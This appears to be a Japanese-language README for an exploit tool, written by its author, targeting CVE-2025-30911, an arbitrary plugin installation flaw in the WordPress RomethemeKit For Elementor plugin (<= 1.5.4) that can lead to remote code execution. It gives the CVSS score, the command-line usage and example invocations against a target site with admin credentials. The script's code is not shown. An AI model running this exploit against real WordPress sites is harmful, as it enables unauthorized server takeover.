
WordPress RomethemeKit For Elementor プラグイン <= 1.5.4 はリモートコード実行(RCE)に対して脆弱です。
このスクリプトは、RomethemeKit For Elementor WordPressプラグイン(<= v1.5.4) の重大な脆弱性を悪用し、認証済みユーザーによる任意のプラグインのインストールおよび有効化を可能にします。これは最終的に**リモートコード実行(RCE)**につながる可能性があります。
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Hこの脆弱性により、認証済みの攻撃者(管理者アクセス権を持つ)は、悪意のある可能性のあるものを含む任意のプラグインをプログラム的にインストールおよび有効化でき、サーバー上での完全なコード実行につながる可能性があります。
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit For CVE-2025-30911 | By Nxploited Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Base URL of the WordPress site
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
-pl, --plugin PLUGIN Plugin to install (default: hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests ライブラリ(pip install requests でインストール)このツールは教育目的および権限のあるセキュリティテスト専用に提供されています。無断使用は違法かつ非倫理的です。
作者: Nxploited | Khaled Alenazi